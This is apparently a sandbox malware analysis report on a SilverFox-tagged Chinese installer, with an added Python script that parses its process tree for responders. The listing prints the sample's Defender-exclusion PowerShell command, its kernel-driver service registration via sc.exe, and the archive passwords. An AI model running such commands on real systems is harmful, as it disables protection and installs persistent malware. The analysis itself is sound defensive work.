Windows Analysis Report
#U5b89#U88c5#U52a9#U624b1.0.3.exe

Overview

General Information

Sample name: #U5b89#U88c5#U52a9#U624b1.0.3.exe (the #Uxxxx escapes are the sandbox's encoding of the Chinese file name 安装助手1.0.3.exe, "Installation Assistant 1.0.3")
renamed because original name is a hash value
Original sample name: 1.0.3.exe
Analysis ID: 1580230
MD5: 3dd1a269e502f7284674c54819e9ad8e
SHA1: f3764c08583b70e6427d8efe97e6daa1582de9a3
SHA256: 9622e99ad30c7b5bef5ad85c34ea80a961f1d5d05dcc9a0083c3fa8a00966228
Tags: exe, SilverFox, winos, user-kafan_shengui

Detection

Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to hide a thread from the debugger
Found driver which could be used to inject code into processes
Hides threads from debuggers
Loading BitLocker PowerShell Module
Protects its processes via BreakOnTermination flag
Query firmware table information (likely to detect VMs)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: New Kernel Driver Via SC.EXE
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • #U5b89#U88c5#U52a9#U624b1.0.3.exe (PID: 7000 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe" MD5: 3DD1A269E502F7284674C54819E9AD8E)
    • #U5b89#U88c5#U52a9#U624b1.0.3.tmp (PID: 3048 cmdline: "C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp" /SL5="$2040C,6541320,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe" MD5: CC931C68EF6CB43932F2B21773072C73)
      • powershell.exe (PID: 3568 cmdline: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 4080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 2760 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • #U5b89#U88c5#U52a9#U624b1.0.3.exe (PID: 6532 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe" /VERYSILENT MD5: 3DD1A269E502F7284674C54819E9AD8E)
        • #U5b89#U88c5#U52a9#U624b1.0.3.tmp (PID: 3328 cmdline: "C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp" /SL5="$1042A,6541320,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe" /VERYSILENT MD5: CC931C68EF6CB43932F2B21773072C73)
          • 7zr.exe (PID: 6032 cmdline: 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 5440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • 7zr.exe (PID: 5660 cmdline: 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 6464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6032 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • sc.exe (PID: 5440 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
              • conhost.exe (PID: 6908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6032 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • sc.exe (PID: 5896 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
              • conhost.exe (PID: 6012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5660 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • sc.exe (PID: 6120 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
              • conhost.exe (PID: 6428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4196 cmdline: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6052 cmdline: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6428 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1364 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5636 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5764 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 764 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4196 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6124 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1664 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5740 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6404 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6028 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5636 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1668 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2820 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6124 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3700 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4044 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6024 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3280 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5756 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3360 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4560 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6976 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1756 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5884 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2788 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5764 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6468 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6124 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6052 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6820 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3872 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5632 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6456 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4024 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6888 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5764 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6116 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4048 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 672 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3000 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1372 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2268 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6568 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6484 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6048 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6908 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6900 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6028 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1668 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6124 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6468 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1664 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6836 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5908 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5708 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6568 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
No configs have been found
No yara matches
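The tree above is the whole infection chain in one listing: the Inno Setup bootstrapper (the .exe) unpacks the real installer into an is-XXXXX.tmp directory and relaunches it with /SL5=; that installer adds a Defender exclusion for all of C:\, relaunches the bootstrapper with /VERYSILENT, unpacks two password-protected 7z archives (7-Zip's -p switch carries the password in clear on the command line, so both passwords are recoverable from the report) and, from a separate top-level cmd.exe, registers tProtect.dll as the auto-start kernel service CleverSoar, which it then tries to start repeatedly. The following script is an added example, not part of the Joe Sandbox report: it rebuilds parent/child relations from the indentation and pulls those artefacts out of the command lines. PROCESS_TREE is a verbatim subset of the tree above. Indentation rather than PID is used for the links because the sandbox reuses PIDs (6032 appears as both a 7zr.exe and a cmd.exe).

```python
"""Rebuild the execution chain from a Joe Sandbox process tree and pull the
actionable artefacts (archive passwords, service registration, Defender
exclusions, silent relaunch) out of the command lines.

Added example, not part of the report. PROCESS_TREE is a verbatim subset of
the report's tree. Parent/child links come from indentation, never from PID
lookups, because the sandbox reuses PIDs (6032 is both 7zr.exe and cmd.exe).
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field

PROCESS_TREE = r"""
  • #U5b89#U88c5#U52a9#U624b1.0.3.exe (PID: 7000 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe" MD5: 3DD1A269E502F7284674C54819E9AD8E)
    • #U5b89#U88c5#U52a9#U624b1.0.3.tmp (PID: 3048 cmdline: "C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp" /SL5="$2040C,6541320,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe" MD5: CC931C68EF6CB43932F2B21773072C73)
      • powershell.exe (PID: 3568 cmdline: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • #U5b89#U88c5#U52a9#U624b1.0.3.exe (PID: 6532 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe" /VERYSILENT MD5: 3DD1A269E502F7284674C54819E9AD8E)
        • #U5b89#U88c5#U52a9#U624b1.0.3.tmp (PID: 3328 cmdline: "C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp" /SL5="$1042A,6541320,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe" /VERYSILENT MD5: CC931C68EF6CB43932F2B21773072C73)
          • 7zr.exe (PID: 6032 cmdline: 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
          • 7zr.exe (PID: 5660 cmdline: 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
          • cmd.exe (PID: 6032 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • sc.exe (PID: 5440 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
  • cmd.exe (PID: 4196 cmdline: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6052 cmdline: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
"""

# One tree line: indentation (2 spaces per level), bullet, image, PID, cmdline, MD5.
_LINE = re.compile(r"^(?P<indent> *)• (?P<image>\S+) \(PID: (?P<pid>\d+) "
                   r"cmdline: (?P<cmd>.*) MD5: (?P<md5>[0-9A-Fa-f]{32})\)$")


@dataclass
class Proc:
    image: str
    pid: int
    cmdline: str
    md5: str
    parent: Proc | None = None
    children: list[Proc] = field(default_factory=list)


def parse_tree(text: str) -> list[Proc]:
    """Parse the listing; a stack of (depth, node) turns indentation into links."""
    procs: list[Proc] = []
    stack: list[tuple[int, Proc]] = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if not m:
            continue                      # "System is w10x64" and blank lines
        depth = len(m["indent"]) // 2
        node = Proc(m["image"], int(m["pid"]), m["cmd"], m["md5"].upper())
        while stack and stack[-1][0] >= depth:
            stack.pop()
        if stack:
            node.parent = stack[-1][1]
            node.parent.children.append(node)
        stack.append((depth, node))
        procs.append(node)
    return procs


def chain(p: Proc) -> list[int]:
    """PIDs from a process up to its root, e.g. [3568, 3048, 7000]."""
    out: list[int] = []
    while p is not None:
        out.append(p.pid)
        p = p.parent
    return out


_SEVENZIP = re.compile(r"7zr?\.exe\s+x\s+(?:-\S+\s+)*(?P<archive>[^-\s]\S*).*?-p(?P<pw>\S+)")
_SC_CREATE = re.compile(r"\bsc(?:\.exe)?\s+create\s+(?P<name>\S+)", re.I)
_BINPATH = re.compile(r'binPath=\s*"([^"]+)"', re.I)
_SVCTYPE = re.compile(r"\btype=\s*(\S+)", re.I)
_EXCLUSION = re.compile(r"Add-MpPreference\s+-Exclusion(?P<kind>\w+)\s+'(?P<val>[^']+)'", re.I)


def extract_artefacts(procs: list[Proc]) -> dict:
    """Artefacts a responder acts on; matched on the executing image only, so the
    cmd.exe wrapper lines do not produce duplicates."""
    found: dict = {"archive_passwords": {}, "services": [],
                   "defender_exclusions": [], "silent_relaunch": []}
    for p in procs:
        cl, image = p.cmdline, p.image.lower()
        if image == "7zr.exe" and (m := _SEVENZIP.search(cl)):
            found["archive_passwords"][m["archive"]] = m["pw"]
        if image == "sc.exe" and (m := _SC_CREATE.search(cl)):
            bp, st = _BINPATH.search(cl), _SVCTYPE.search(cl)
            found["services"].append({"name": m["name"], "binPath": bp and bp.group(1),
                                      "type": st and st.group(1), "pid": p.pid})
        if image == "powershell.exe" and (m := _EXCLUSION.search(cl)):
            found["defender_exclusions"].append((m["kind"], m["val"], p.pid))
        if "/VERYSILENT" in cl.upper() and image.endswith(".exe"):
            found["silent_relaunch"].append(p.pid)
    return found


if __name__ == "__main__":
    tree = parse_tree(PROCESS_TREE)
    for p in tree:
        print(" -> ".join(map(str, chain(p))), p.image)
    print(extract_artefacts(tree))
```

The archive passwords are the most immediately useful output: with them, res.dat and locale3.dat from the sandbox's dropped-files list can be unpacked offline with 7z x -p<password> for static analysis of the stage that installs the driver.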

System Summary

Sigma match (rule author: Florian Roth, Nextron Systems) | Source: Process started
  Command / CommandLine / ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
  CommandLine|base64offset|contains: *&
  Image / NewProcessName / OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  ProcessId: 3568, ProcessName: powershell.exe
  ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp" /SL5="$2040C,6541320,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe"
  ParentImage: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp
  ParentProcessId: 3048, ParentProcessName: #U5b89#U88c5#U52a9#U624b1.0.3.tmp
Sigma match (rule author: Nasreddine Bencherchali, Nextron Systems) | Source: Process started
  Command / CommandLine / ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
  Image / NewProcessName / OriginalFileName: C:\Windows\System32\sc.exe
  ProcessId: 6052, ProcessName: sc.exe
  ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
  ParentImage: C:\Windows\System32\cmd.exe
  ParentProcessId: 4196, ParentProcessName: cmd.exe
Sigma match (rule authors: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community) | Source: Process started
  Command / CommandLine / ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
  Image / NewProcessName / OriginalFileName: C:\Windows\System32\sc.exe
  ProcessId: 6052, ProcessName: sc.exe
  ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
  ParentImage: C:\Windows\System32\cmd.exe
  ParentProcessId: 4196, ParentProcessName: cmd.exe
Sigma match (rule author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)) | Source: Process started
  Command / CommandLine / ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
  CommandLine|base64offset|contains: *&
  Image / NewProcessName / OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  ProcessId: 3568, ProcessName: powershell.exe
  ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp" /SL5="$2040C,6541320,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe"
  ParentImage: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp
  ParentProcessId: 3048, ParentProcessName: #U5b89#U88c5#U52a9#U624b1.0.3.tmp
No Suricata rule has matched


AV Detection

Source: C:\Program Files (x86)\Windows NT\hrsw.vbc | Virustotal: Detection: 15%
Source: #U5b89#U88c5#U52a9#U624b1.0.3.exe | Virustotal: Detection: 6%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 84.0% probability
Source: #U5b89#U88c5#U52a9#U624b1.0.3.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: #U5b89#U88c5#U52a9#U624b1.0.3.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb | found in: 7zr.exe, 0000000C.00000003.2169234402.0000000002150000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000C.00000003.2169131101.0000000002F70000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.12.dr
  (tProtect.dll is the file the sample registers as the CleverSoar kernel service in the process tree; its PDB path identifies it as a WDK free (release) build for the amd64 target of a driver named TfSysMon from a "threat~1.26" source tree, i.e. a third-party driver dropped under C:\Program Files (x86)\Windows NT\ rather than a Windows component. The 32-bit installer dropping a 64-bit driver is expected on the w10x64 analysis system; the file surfaces in 7zr.exe memory because it is extracted from one of the password-protected archives.)
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 6_2_6CC4AEC0 FindFirstFileA,FindClose,6_2_6CC4AEC0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_007C6868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,10_2_007C6868
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_007C7496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,10_2_007C7496
